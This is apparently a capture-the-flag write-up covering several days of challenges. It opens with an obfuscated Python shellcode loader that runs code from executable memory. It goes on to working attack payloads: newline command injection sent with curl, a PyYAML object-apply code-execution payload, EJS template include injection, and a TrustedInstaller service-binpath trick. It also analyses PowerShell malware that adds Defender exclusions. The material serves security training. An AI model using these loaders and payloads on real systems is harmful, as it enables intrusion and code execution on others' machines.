exec(base64.b64decode("aW1wb3J0IGN0eXBlcwoKZGVmIHhvcl9kZWNyeXB0KGNpcGhlcnRleHRfYnl0ZXMsIGtleV9ieXRlcyk6CiAgICBkZWNyeXB0ZWRfYnl0ZXMgPSBieXRlYXJyYXkoKQogICAga2V5X2xlbmd0aCA9IGxlbihrZXlfYnl0ZXMpCiAgICBmb3IgaSwgYnl0ZSBpbiBlbnVtZXJhdGUoY2lwaGVydGV4dF9ieXRlcyk6CiAgICAgICAgZGVjcnlwdGVkX2J5dGUgPSBieXRlIF4ga2V5X2J5dGVzW2kgJSBrZXlfbGVuZ3RoXQogICAgICAgIGRlY3J5cHRlZF9ieXRlcy5hcHBlbmQoZGVjcnlwdGVkX2J5dGUpCiAgICByZXR1cm4gYnl0ZXMoZGVjcnlwdGVkX2J5dGVzKQoKc2hlbGxjb2RlID0gYnl0ZWFycmF5KHhvcl9kZWNyeXB0KGJhc2U2NC5iNjRkZWNvZGUoJ3pHZGdUNkdIUjl1WEo2ODJrZGFtMUE1VGJ2SlAvQXA4N1Y2SnhJQ3pDOXlnZlgyU1VvSUwvVzVjRVAveGVrSlRqRytaR2dIZVZDM2NsZ3o5eDVYNW1nV0xHTmtnYStpaXhCeVRCa2thMHhicVlzMVRmT1Z6azJidURDakFlc2Rpc1U4ODdwOVVSa09MMHJEdmU2cWU3Z2p5YWI0SDI1ZFBqTytkVllrTnVHOHdXUT09JyksIGJhc2U2NC5iNjRkZWNvZGUoJ21lNkZ6azBIUjl1WFR6enVGVkxPUk0yVitacU1iQT09JykpKQpwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLCBjdHlwZXMuY19pbnQoMHg0MCkpCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLCBidWYsIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkpCmZ1bmN0eXBlID0gY3R5cGVzLkNGVU5DVFlQRShjdHlwZXMuY192b2lkX3ApCmZuID0gZnVuY3R5cGUocHRyKQpmbigp").decode('utf-8'))
#g0emgoemboemoetmboemomeio

The decoded script XORs another base64-encoded payload with a base64-encoded key (base64 is available without an import because exec runs the script in the outer module’s namespace). The resulting shellcode is written to executable memory and called directly.

import ctypes

def xor_decrypt(ciphertext_bytes, key_bytes):
    decrypted_bytes = bytearray()
    key_length = len(key_bytes)
    for i, byte in enumerate(ciphertext_bytes):
        decrypted_byte = byte ^ key_bytes[i % key_length]
        decrypted_bytes.append(decrypted_byte)
    return bytes(decrypted_bytes)

shellcode = bytearray(xor_decrypt(base64.b64decode('zGdgT6GHR9uXJ682kdam1A5TbvJP/Ap87V6JxICzC9ygfX2SUoIL/W5cEP/xekJTjG+ZGgHeVC3clgz9x5X5mgWLGNkga+iixByTBkka0xbqYs1TfOVzk2buDCjAesdisU887p9URkOL0rDve6qe7gjyab4H25dPjO+dVYkNuG8wWQ=='), base64.b64decode('me6Fzk0HR9uXTzzuFVLORM2V+ZqMbA==')))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
functype = ctypes.CFUNCTYPE(ctypes.c_void_p)
fn = functype(ptr)
fn()

Shellcode

Using the key identified in the previous stage, the ciphertext can be decoded and decrypted using CyberChef, and the shellcode can be saved as shellcode.bin.

The decrypted shellcode can then be imported into Ghidra and decompiled. The resulting C function appears to perform a series of XOR operations on an array of hexadecimal values.

void FUN_00000000(void)

{
  uint3 uVar1;
  int iVar2;
  uint *puVar3;
  uint *puVar4;
  undefined1 *puVar5;
  uint *puVar6;
  uint local_ac [9];
  uint uStack_88;
  undefined1 local_84 [128];
  
  uStack_88 = 0x8484d893;
  local_ac[8] = 0x97c6c390;
  local_ac[7] = 0x929390c3;
  local_ac[6] = 0xc7c3c490;
  local_ac[5] = 0x939c939c;
  local_ac[4] = 0xc6c69cc0;
  local_ac[3] = 0x939cc697;
  local_ac[2] = 0xc19dc794;
  local_ac[1] = 0x9196c1de;
  puVar4 = local_ac;
  puVar3 = local_ac;
  puVar6 = local_ac;
  local_ac[0] = 0xc2c4c9c3;
  iVar2 = 10;
  do {
    *puVar4 = *puVar4 ^ 0xa5a5a5a5;
    puVar4 = puVar4 + 1;
    iVar2 = iVar2 + -1;
  } while (iVar2 != 0);
  uVar1 = (uint3)uStack_88;
  uStack_88 = (uint)(uVar1 & 0xffff);
  puVar5 = local_84;
  iVar2 = 0x26;
  do {
    *puVar5 = *(undefined1 *)puVar3;
    puVar3 = (uint *)((int)puVar3 + 1);
    puVar5 = puVar5 + 1;
    iVar2 = iVar2 + -1;
  } while (iVar2 != 0);
  *puVar5 = 0;
  iVar2 = 0x40;
  do {
    *(undefined1 *)puVar6 = 1;
    puVar6 = (uint *)((int)puVar6 + 1);
    iVar2 = iVar2 + -1;
  } while (iVar2 != 0);
  return;
}

The same XOR can be applied in CyberChef; converting the result to little-endian byte order reveals the flag.

flag{d341b8d2c96e9cc96965afbf5675fc26}
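The decompiled function above is a classic stack string: ten dwords are written to the stack, each is XORed with 0xa5a5a5a5, and 0x26 bytes are then copied out (with uStack_88 masked to its low 16 bits, because only two of its bytes are needed). The following added example, not part of the writeup, reproduces that by hand in Python instead of CyberChef; the dwords are copied from the Ghidra listing, in stack order (local_ac[0..8] followed by uStack_88, which sits immediately after the array).

```python
import struct

# Added example (not the challenge's code): reproduce by hand what the decompiled
# function does. The ten dwords are copied from the Ghidra listing in stack order:
# local_ac[0..8] followed by uStack_88, which sits right after the array on the stack.
DWORDS = [
    0xC2C4C9C3,  # local_ac[0]
    0x9196C1DE,  # local_ac[1]
    0xC19DC794,  # local_ac[2]
    0x939CC697,  # local_ac[3]
    0xC6C69CC0,  # local_ac[4]
    0x939C939C,  # local_ac[5]
    0xC7C3C490,  # local_ac[6]
    0x929390C3,  # local_ac[7]
    0x97C6C390,  # local_ac[8]
    0x8484D893,  # uStack_88
]
KEY = 0xA5A5A5A5
LENGTH = 0x26  # the copy loop runs 0x26 times, so 38 bytes make up the string


def decode_stack_string(dwords, key=KEY, length=LENGTH) -> str:
    """XOR each dword with the key, lay them out little-endian as a 32-bit x86 stack
    does, and keep the first `length` bytes. Masking uStack_88 to its low 16 bits in
    the decompiled code is the same as keeping only those two bytes here."""
    raw = struct.pack("<%dI" % len(dwords), *(d ^ key for d in dwords))
    return raw[:length].decode("ascii")


def decode_stack_string_masked(dwords, key=KEY, length=LENGTH) -> str:
    """Variant that applies the & 0xffff mask to the last dword, as the listing does,
    to show it changes nothing once the copy length is honoured."""
    masked = list(dwords[:-1]) + [(dwords[-1] ^ key) & 0xFFFF ^ key]
    return decode_stack_string(masked, key, length)


if __name__ == "__main__":
    print(decode_stack_string(DWORDS))
```

The same approach works for any stack-string routine Ghidra shows as a run of constant stores followed by a short XOR loop: collect the constants in address order, apply the loop's operation, and pack with the target's endianness.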

Day 02

OFA

Category: 👶 Warmups
Author: Matt Kiely (HuskyHacks)

Challenge Prompt

Two factors? In this economy??!!

๐Ÿ–ฅ๏ธ OFA - 10.1.30.23

Solution

Navigating to the webpage for the challenge reveals a login page.

Login page

After entering an arbitrary username and password, such as user:pass, the login page redirects to /otp.

OTP page

Entering a random 6-digit code returns an error message stating that the code does not match 103248.

OTP error

Entering the provided code, 103248, redirects to /success, which reveals the flag.

Flag page

flag{013cb9b123afec26b572af5087364081}

Spaghetti

Category: 🐞 Malware
Author: John Hammond

Challenge Prompt

You know, I’ve been thinking… at the end of the day, spaghetti is really just strings of pasta!

Anyway, we saw this weird file running on startup. Can you figure out what this is?

I’m sure you’ll get more understanding of the questions below as you explore!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

IMPORTANT

The ZIP archive password is infected.

NOTE

You may find a public paste URL that is expired. This is an artifact of the original malware sample and is intentional. This URL is not necessary for the challenge.

📄 spaghetti.zip - 331 KB

MainFileSettings

Uncover the flag within the “main file.”

NOTE

Once you uncover the intended payload, you shouldn’t need to do any further analysis. Use context clues from the challenge description and you should find the flag.

My Fourth Oasis

Uncover the flag within “my fourth oasis.”

MEMEMAN

Uncover the flag beside “MEMEMAN.”

Solution

The provided file, spaghetti.zip, contains two files: AYGIW.tmp and spaghetti. AYGIW.tmp contains a single line of seemingly meaningless, garbled ASCII text, which is likely encrypted or encoded. spaghetti contains a somewhat obfuscated PowerShell script.

The script starts with a large block of randomly named variables, broken up by blocks of comments containing quotes from various people. Although the quotes are not repeated, the same variable declarations are repeated numerous times throughout the script.

MainFileSettings

After cleaning up the script by removing the blocks of quotes and repeated variable declarations, what remains are several short utility functions and ~40 lines of code. The first block following the function declarations reads the contents of AYGIW.tmp and stores it in a variable named MainFileSettings.

$currentDirectory = Get-Location
$fileName = "AYGIW.tmp"
$filePath = Join-Path -Path $currentDirectory -ChildPath $fileName
$MainFileSettings = Get-Content -Path $filePath

Next, the content of AYGIW.tmp is decoded by the HombaAmigo function.

Function HombaAmigo([String] $IN) {
    $RunRBTX1 = $IN.Replace('~', '000').Replace('%', '4')
    $bytes = New-Object -TypeName byte[] -ArgumentList ($RunRBTX1.Length / 1 + 1 + 0)
    for ($i = 0; $i -lt $RunRBTX1.Length; $i += 1 + 1 + 0) {
        $bytes[$i / 2] = [Convert]::ToByte($RunRBTX1.Substring($i, 1 + 1 + 0), 6 + 10 + 0)
    }
    return [byte[]]$bytes
}

[byte[]]$WULC4 = HombaAmigo($MainFileSettings.replace('WT', '00'))

After careful review, these two blocks should be safe to execute, resulting in a byte array stored in the WULC4 variable. This byte array can then be written to a file for further analysis.

$WULC4 | Out-File MainFileSettings

The resulting byte array appears to be decimal encoded. After using CyberChef to decode the data, the resulting output appears to be a Windows PE file. With the file saved as MainFileSettings.exe, the file command confirms this.

MainFileSettings.exe: PE32 executable for MS Windows 5.01 (GUI), Intel i386, 7 sections

Using strings and grep, the first flag is found.

strings temp/MainFileSettings.exe | grep -i flag
flag{39544d3b5374ebf7d39b8c260fc4afd8}

My Fourth Oasis

Returning to the spaghetti PowerShell script, the next thing that stands out is the MyOasis4 variable, which the challenge prompt for the second flag seems to hint at. The assignment of this variable converts a long string of ~ and % characters into a binary string, then uses the FonatozQZ function to decode it.

Function FonatozQZ($monoTXtak) {
    $byTZlist = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $monoTXtak.Length; $i += 8) {
        $byTZlist.Add([Convert]::ToByte([String] $monoTXtak.Substring($i, 8), 2))
    }
    return [System.Text.Encoding]::ASCII.GetString($byTZlist.ToArray())
}

$MyOasis4 = (FonatozQZ("~%%%~~%%~%%%~%~~~%%~~~~%~%%%~~%~~%%%~%~~~~%~%%~%~%%%~~%%~%%~%%~~~%%~~%~%~%%~~%~%~%%%~~~~~~%~~~~~~~%%~~%~~~%%~~%%~~~~%~%~~~%~~~%%~~%~~~~~~%~~~%~~~%%~%~~%~%%%~~%%~%%~~~~%~%%~~~%~~%%~%%~~~%%~~%~%~~%~~~~~~%~%~~%%~%%~~~%%~%%%~~%~~%%~%~~%~%%%~[...truncated...]".Replace('~', '0').Replace('%', '1')))

Just as with the byte array earlier, the contents of the MyOasis4 variable can be written to a separate file for further analysis.

$MyOasis4 | Out-File MyOasis4

The result is another PowerShell script, which contains a commented-out line with an HTML-encoded string. Decoding it with CyberChef reveals the second flag.

# $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('&#102;&#108;&#97;&#103;&#123;&#98;&#51;&#49;&#51;&#55;&#57;&#52;&#100;&#99;&#101;&#102;&#51;&#51;&#53;&#100;&#97;&#54;&#50;&#48;&#54;&#100;&#53;&#52;&#97;&#102;&#56;&#49;&#98;&#54;&#50;&#48;&#51;&#125;'))")
flag{b313794dcef335da6206d54af81b6203}

MEMEMAN

Once again, returning to the spaghetti PowerShell script, there is a second, long string encoded in the same manner as MyOasis4.

$TDefo = (FonatozQZ("~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~[...truncated...]".Replace('~', '0').Replace('%', '1')))

$TDefo | Out-File TDefo

The result is yet another PowerShell script, which contains the following lines near the top. The first references MEMEMAN, which was hinted at in the challenge prompt; the second contains the final flag.

Add-MpPreference -ExclusionPath  C:\ProgramData\MEMEMAN\
# Add-MpPreference -ExclusionExtension "flag{60814731f508781b9a5f8636c817af9d}"
flag{60814731f508781b9a5f8636c817af9d}
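All three flags came out of the same two decoding helpers in the spaghetti script: HombaAmigo (undo the WT/~/% substitutions, then read hex pairs) for the MainFileSettings byte array, and FonatozQZ (~/% to 0/1, then 8-bit ASCII) for MyOasis4 and TDefo. The following added example is not from the sample or the writeup; it ports both helpers to Python, together with the decimal-text step and a PE header check, so the stages can be unpacked without running any of the PowerShell. The ~/% sample is the first 88 characters of the MyOasis4 string above; the hex sample and the fake PE header are constructed here.

```python
# Added example (not from the sample): Python ports of the two decoding helpers in the
# spaghetti script, so each stage can be unpacked without executing any of it.

# First 88 characters of the MyOasis4 string from the script (excerpt).
MYOASIS4_PREFIX = "~%%%~~%%~%%%~%~~~%%~~~~%~%%%~~%~~%%%~%~~~~%~%%~%~%%%~~%%~%%~%%~~~%%~~%~%~%%~~%~%~%%%~~~~"
# Constructed input in the AYGIW.tmp style; not taken from the real file.
HOMBA_SAMPLE = "%1WT%2~3"


def homba_amigo(text: str) -> bytes:
    """Port of HombaAmigo plus the .replace('WT', '00') its caller applies first:
    undo the three substitutions, then read the result as hex pairs.
    The original allocates Length+1 bytes and leaves the unfilled tail as zeros;
    this port returns only the decoded bytes."""
    hexstr = text.replace("WT", "00").replace("~", "000").replace("%", "4")
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string after substitution")
    return bytes.fromhex(hexstr)


def fonatoz_qz(text: str) -> str:
    """Port of FonatozQZ plus its caller's .Replace('~', '0').Replace('%', '1'):
    read 8-bit groups of the bit string as ASCII."""
    bits = text.replace("~", "0").replace("%", "1")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8)).decode("ascii")


def decimal_text_to_bytes(text: str) -> bytes:
    """The byte array written to MainFileSettings is decimal text; turn it back into bytes."""
    return bytes(int(value) for value in text.split())


def looks_like_pe(data: bytes) -> bool:
    """Cheap check for a Windows PE: an 'MZ' DOS header and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def fake_pe_header() -> bytes:
    """Constructed minimal header (not a real executable) for exercising looks_like_pe."""
    return b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00"


if __name__ == "__main__":
    print(homba_amigo(HOMBA_SAMPLE))
    print(fonatoz_qz(MYOASIS4_PREFIX))
    print(looks_like_pe(fake_pe_header()))
```

Against the real sample, the full pipeline for the first flag is homba_amigo on the contents of AYGIW.tmp, decimal_text_to_bytes on the resulting text, and looks_like_pe on the output before writing it to disk; for the second and third flags, fonatoz_qz on the full MyOasis4 and TDefo strings yields the two embedded scripts.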

Day 03

Maximum Sound

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt

Dang, this track really hits the target! It sure does get loud though, headphone users be warned!!

📄 maximum_sound.wav - 9.82 MB

Solution

After listening to the audio file and analyzing the spectrogram using Audacity, there seems to be a very narrow range of frequencies in use. Additionally, the beginning of the audio is distinctly different from that of the rest of the file, featuring a long leader tone at 1900 Hz, and several shorter tones in the range of 1100 Hz and 1300 Hz. The majority of the audio continually shifts between 1500 Hz and 2300 Hz. These are all characteristics of slow scan television (SSTV).

Spectrogram

Using an online SSTV decoder reveals the following image.

SSTV decoded image

The image appears to contain a QR-like barcode. After reviewing the barcode page on Wikipedia, this appears to be a MaxiCode, which was developed by UPS for tracking packages.

Using an online barcode reader to scan the code reveals the flag.

flag{d60ea9faec46c2de1c72533ae3ad11d7}

Day 04

ARIKA

Category: 🌐 Web
Author: John Hammond

Challenge Prompt

The Arika ransomware group likes to look slick and spiffy with their cool green-on-black terminal style website… but it sounds like they are worried about some security concerns of their own!

🖥️ ARIKA - 10.1.198.80

NOTE

The password for the ZIP archive below is arika.

📄 arika.zip - 6.94 KB

Solution

Navigating to the webpage for the challenge reveals the following prompt.

Web prompt

This page allows commands to be entered, which are sent to the server in an HTTP POST request. In the JavaScript snippet below, the command entered by the user is stored in the line variable, and all newlines are removed from it before it is submitted. This is an important detail that will come into play later.

editSpan.addEventListener("keydown", (e) => {
  if (e.key === "Enter") {
    e.preventDefault();
    const raw = editSpan.textContent || "";
    const line = raw.replace(/\r?\n/g, "");

    pre.textContent = window.PROMPT + line;

    runCommand(line);
  } else if (e.key === "Tab") {

    e.preventDefault();
    insertAtCaret(editSpan, "  ");
  }
});

function runCommand(line) {
  if (line.trim() === "") {

    appendLine("");
    createPromptLine();
    return;
  }

  fetch("/", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ command: line })
  })
    .then(r => r.json())
    .then(({ ok, stdout, stderr, code, clear }) => {
      if (clear) {
        screen.innerHTML = "";
        createPromptLine();
        return;
      }
      appendBlocks(stdout || "", stderr || "");
      if (!ok && code !== 0 && !(stderr && stderr.length)) {
        appendLine(`(exit ${code})`);
      }

      createPromptLine();
    })
    .catch(err => {
      appendLine("");
      appendLine(`Client error: ${err}`);
      createPromptLine();
    });
}

The source code is provided as part of the challenge. The server is written in Python and uses Flask. POST requests are handled by the exec_command function, which checks if the submitted command is in the allow list. It does this using a regular expression that only checks if the provided command begins with a valid command name. If all checks pass, the run function is called, and the submitted command is executed in a new shell. The result of the executed command is returned in the HTTP response.

import os, re
import subprocess
from flask import Flask, render_template, request, jsonify

app = Flask(__name__)

ALLOWLIST = ["leaks", "news", "contact", "help",
             "whoami", "date", "hostname", "clear"]

def run(cmd):
    try:
        proc = subprocess.run(["/bin/sh", "-c", cmd],capture_output=True,text=True,check=False)
        return proc.stdout, proc.stderr, proc.returncode
    except Exception as e:
        return "", f"error: {e}\n", 1

@app.get("/")
def index():
    return render_template("index.html")

@app.post("/")
def exec_command():
    data = request.get_json(silent=True) or {}
    command = data.get("command") or ""
    command = command.strip()
    if not command:
        return jsonify(ok=True, stdout="", stderr="", code=0)
    if command == "clear":
        return jsonify(ok=True, stdout="", stderr="", code=0, clear=True)
    if not any([ re.match(r"^%s$" % allowed, command, len(ALLOWLIST)) for allowed in ALLOWLIST]):
        return jsonify(ok=False, stdout="", stderr="error: Run 'help' to see valid commands.\n", code=2)
    
    stdout, stderr, code = run(command)
    return jsonify(ok=(code == 0), stdout=stdout, stderr=stderr, code=code)

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=int(os.getenv("PORT", 5000)), debug=False)

Because the server only checks the beginning of the provided command against the allow list, any additional commands may be provided after that, separated by \n. In some command execution scenarios, commands may be separated using a shell operator such as &&. In this case, however, subprocess.run is not called with shell=True, so these operators are not evaluated.
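To see the bypass mechanically, here is the allow-list check from exec_command next to an exact-match version, as an added example that is not part of the writeup or the challenge code (the function names are my own). The third positional argument of re.match is flags; len(ALLOWLIST) is 8, which is the value of re.MULTILINE, so $ may match at the end of the first line and nothing after a newline is ever examined.

```python
import re

# Allow list as it appears in the challenge source above.
ALLOWLIST = ["leaks", "news", "contact", "help",
             "whoami", "date", "hostname", "clear"]


def vulnerable_is_allowed(command: str) -> bool:
    """The allow-list test exactly as exec_command performs it.

    re.match(pattern, string, flags): the third positional argument is the
    flags value. len(ALLOWLIST) is 8, which is re.MULTILINE, so '$' matches
    at the end of the first line rather than the end of the whole string.
    """
    return any(re.match(r"^%s$" % allowed, command, len(ALLOWLIST))
               for allowed in ALLOWLIST)


def hardened_is_allowed(command: str) -> bool:
    """Exact string membership: no regex, no flags, the whole command is compared."""
    return command in ALLOWLIST


def verdicts(command: str) -> dict:
    """Helper for the demo: the result of both checks for one submitted command."""
    return {"vulnerable": vulnerable_is_allowed(command),
            "hardened": hardened_is_allowed(command)}


if __name__ == "__main__":
    assert re.MULTILINE == len(ALLOWLIST) == 8
    samples = [
        "date",                       # legitimate command
        "date\ncat /app/flag.txt",    # the writeup's payload: a second line rides along
        "date && whoami",             # same line: '^date$' cannot match, both reject
        "dates",                      # prefix only, both reject
    ]
    for cmd in samples:
        print(repr(cmd), verdicts(cmd))
```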

As previously mentioned, the client JavaScript removes all \n characters from the command before submitting it to the server. To overcome this, the crafted HTTP request can be sent directly using curl.

curl 'http://10.1.198.80/' \
  -X POST \
  -H 'Content-Type: application/json' \
  -d '{"command":"date\ncat /app/flag.txt"}'

The response contains the result of both commands, which includes the flag.

{"code":0,"ok":true,"stderr":"","stdout":"Fri Oct 31 16:06:51 UTC 2025\nflag{eaec346846596f7976da7e1adb1f326d}\n"}
flag{eaec346846596f7976da7e1adb1f326d}

Snooze

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt

Don’t bug me, I’m sleeping! Zzzz… zzz… zzzz….

Uncover the flag from the file presented.

📄 snooze - 45 B

Solution

Checking the file type using the file command returns the following.

snooze: compress'd data 16 bits

A quick Google search suggests this file type typically has a .z extension, which was hinted at in the challenge prompt.

Using uncompress to uncompress the file reveals the flag.

uncompress -c snooze
flag{c1c07c90efa59876a97c44c2b175903e}

Day 05

Sigma Linter

Category: 🌐 Web
Author: John Hammond

Challenge Prompt

Oh wow, another web app interface for command-line tools that already exist!

This one seems a little busted, though…

🖥️ Sigma Linter - 10.1.172.107

Solution

Navigating to the webpage for the challenge reveals a Sigma rule editor and linter with several example rules.

Sigma Linter webpage

Clicking the Lint Rule button submits the YAML content to the server in a POST request to /lint.

Linting the registry_modification.yml example results in the following error message.

YAML Error

YAML parsing error: mapping values are not allowed here in "<unicode string>", line 7, column 17: TargetObject: '*\Run\*' ^

A quick search for this error message suggests the server is parsing the YAML content using PyYAML. The tutorial section of the documentation contains the following warning.

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.

Assuming the unsafe yaml.load function is used, Python tags, such as !!python/object/apply, may allow for command execution.

Submitting the following crafted payload should result in cat flag.txt being executed. With capture_output and text set to true, the result should be captured and returned.

title: Basic Process Creation
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image: !!python/object/apply:subprocess.run
      args: [['cat', 'flag.txt']]
      kwds:
        capture_output: true
        text: true
  condition: selection
level: low

Attempting to lint the above payload results in the following error message, which includes the flag.

Invalid

{'Image': CompletedProcess(args=['cat', 'flag.txt'], returncode=0, stdout='flag{b692115306c8e5c54a2c8908371a4c72}\n', stderr='')} is not valid under any of the given schemas

Additionally, the formatted Sigma rule also includes the flag.

title: Basic Process Creation
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image: !!python/object:subprocess.CompletedProcess
      args:
      - cat
      - flag.txt
      returncode: 0
      stdout: 'flag{b692115306c8e5c54a2c8908371a4c72}

        '
      stderr: ''
  condition: selection
level: low
flag{b692115306c8e5c54a2c8908371a4c72}

Day 06

Emotional

Category: 🌐 Web
Author: John Hammond

Challenge Prompt

Don’t be shy, show your emotions! Get emotional if you have to! Uncover the flag.

🖥️ Emotional - 10.1.37.155

📄 emotional.zip - 4.21 KB

Solution

Navigating to the webpage for the challenge reveals a page to select and update the current emoji.

Emotional webpage

Selecting an emoji and clicking the Update Emotion button sends a POST request to /setEmoji containing the selection.

Reviewing the provided source code, the server uses the EJS templating language. When rendering the page, the server replaces <% profileEmoji %> in the template with the user provided input.

const profilePage = data.replace(/<% profileEmoji %>/g, profile.emoji);
const renderedHtml = ejs.render(profilePage, { profileEmoji: profile.emoji });
res.send(renderedHtml);

Because the server does not perform any validation on the user provided input, an include template tag may be submitted instead of an emoji. When the page is rendered, the contents of the included file will be displayed. Based on the directory structure of the provided source code, the payload below should include the flag in the response.

<%- include('/emoji_profile/flag.txt'); %>

After URL encoding the payload and submitting the POST request using curl, subsequent GET requests to / include the flag.

curl 'http://10.1.37.155/setEmoji' \
  -X POST \
  -d "emoji=%3C%25-%20include('/emoji_profile/flag.txt');%20%25%3E"

curl -s 'http://10.1.37.155/' | grep -oE "flag\{[a-z0-9]{32}\}"
flag{8c8e0e59d1292298b64c625b401e8cfa}

Day 07

Trust Me

Category: 🌐 Web
Author: John Hammond

Challenge Prompt

C’mon bro, trust me! Just trust me!! Trust me bro!!!

The TrustMe.exe program on this Windows desktop “doesn’t trust me?”

It says it will give me the flag, but only if I “have the permissions of Trusted Installer”…?

If you are using the VPN, you can RDP to this challenge with:

Username: Administrator
Password: h$4#82PSK0BUBaf7

NOTE

This virtual machine does not have Internet access.

🖥️ Trust Me - 10.1.81.74

Solution

Executing TrustMe.exe displays the following access denied message.

TrustMe.exe error

The “quick and dirty” approach described by James Forshaw in his blog post about becoming TrustedInstaller does execute TrustMe.exe as TrustedInstaller; however, since it is a GUI application, the dialog box is not displayed, and the flag cannot be obtained this way.

sc.exe config TrustedInstaller binpath= "C:\Users\Administrator\Desktop\TrustMe.exe"; sc.exe start TrustedInstaller

Using Task Manager, a dump file of the process can be created by right-clicking and selecting Create dump file. This will automatically save the dump file to the temp directory.

Task Manager

Using PowerShell to search the dump file, the flag is revealed.

Select-String -Path C:\Users\Administrator\AppData\Local\Temp\2\TrustMe.DMP -Pattern 'flag\{[a-z0-9]{32}\}'
flag{c6065b1f12395d526595e62cf1f4d82a}

Day 09

Tabby’s Date

Category: 🔍 Forensics
Author: John Hammond

Challenge Prompt

Ohhhh, Tab, Tab, Tab…. what has she done.

My friend Tabby just got a new laptop and she’s been using it to take notes. She says she puts her whole life on there!

She was so excited to finally have a date with a boy she liked, but she completely forgot the details of where and when. She told me she remembers writing it in a note… but she doesn’t think she saved it!!

She shared with us an export of her laptop files.

📄 tabbys_date.zip - 39.8 KB

NOTE

The password to the ZIP archive is tabbys_date.

Can you help us find the details of Tab’s date?

Solution

The provided zip file contains a Windows directory structure, with the only files of interest contained in C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe. The TabState directory contains files associated with the currently open tabs in Windows 11 Notepad. These files include information about if and where each file is saved, as well as what data the file contains.

C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe
└── LocalState
    └── TabState
        ├── 002d2531-9aff-42b1-b54d-b178c88063b4.bin
        ├── 04165ca3-c82b-42ca-ab07-0c774ae66efd.bin
        ├── 056941ef-d51d-4e57-9a55-b59d58bf3fcb.bin
        ├── 14623d59-ad8c-43a8-b669-587f049a1516.bin
        ├── 17de440f-3f69-4d8a-94fe-f3d4b9cf0c3f.bin
        ├── 1aebb59c-5d51-41f1-918e-dec9e1a28ce1.bin
        ├── 2d755c27-5840-47ad-a4ca-ed8041dd3047.bin
        ├── 2e0dd6b6-ba93-4efc-9fd4-985dad74869a.bin
        ├── 414e4071-60e6-4bb6-9a5a-f1e5bf6fe79c.bin
        ├── 45dcdbe4-26b5-4e0b-ba2d-29e9e9c1e11b.bin
        ├── 4f1c96a1-960c-4cee-9751-fe4b4f59fdd0.bin
        ├── 5a57ac85-7e99-4bfc-9e13-f0d28a2bcc20.bin
        ├── 66f955a8-6994-47c6-8326-0f128dafd0b9.bin
        ├── 68d7e607-77c4-4d35-8ef2-0170a84efe5f.bin
        ├── 68fefe2f-a7a6-4afa-b383-7fdc142aadde.bin
        ├── 711f26f1-0eff-4a34-a78c-03562e44a36b.bin
        ├── 7458196e-e979-4d94-982a-246fca3db028.bin
        ├── 7ba066a2-e0cb-4c06-9339-316411a3da27.bin
        ├── 9925cc8a-6440-4128-acae-f31541130a5e.bin
        ├── 9bf7ca49-e491-4691-a21a-f3263bb695a2.bin
        ├── 9e96bd4b-4155-4558-b97a-edcdf01d4584.bin
        ├── a16d5079-b2f7-4a54-b3d5-b32256c4f238.bin
        ├── a2048a5f-5cb5-460d-8ce6-70899de24d9c.bin
        ├── a9da0602-fcd2-4793-9bab-70276e881006.bin
        ├── af1fbc46-41cb-4d4b-9c34-02b874bfe9c6.bin
        ├── b5074fe7-4f54-4728-afe9-1c063d211a82.bin
        ├── b5154796-9d23-43ce-8a6c-c373e63f22c0.bin
        ├── bcd5d203-1523-4b86-a572-c1c3afded478.bin
        ├── c3cbe154-ef26-4e93-9183-c7fd323fe8c0.bin
        ├── c4b77218-ef21-4a7f-9814-e4444f82475a.bin
        ├── cb2f0c84-6293-4e63-8575-78dc879945e0.bin
        ├── cd01dd8e-32f6-4f88-b9bb-4009afca3fea.bin
        ├── dcfa4d00-41c8-439a-b1bd-2706dd8dbe0d.bin
        ├── dea21c9d-4534-4d38-a60b-0a5c1b9b5928.bin
        ├── e21dc9ae-2a03-42bf-8972-35ce8d524695.bin
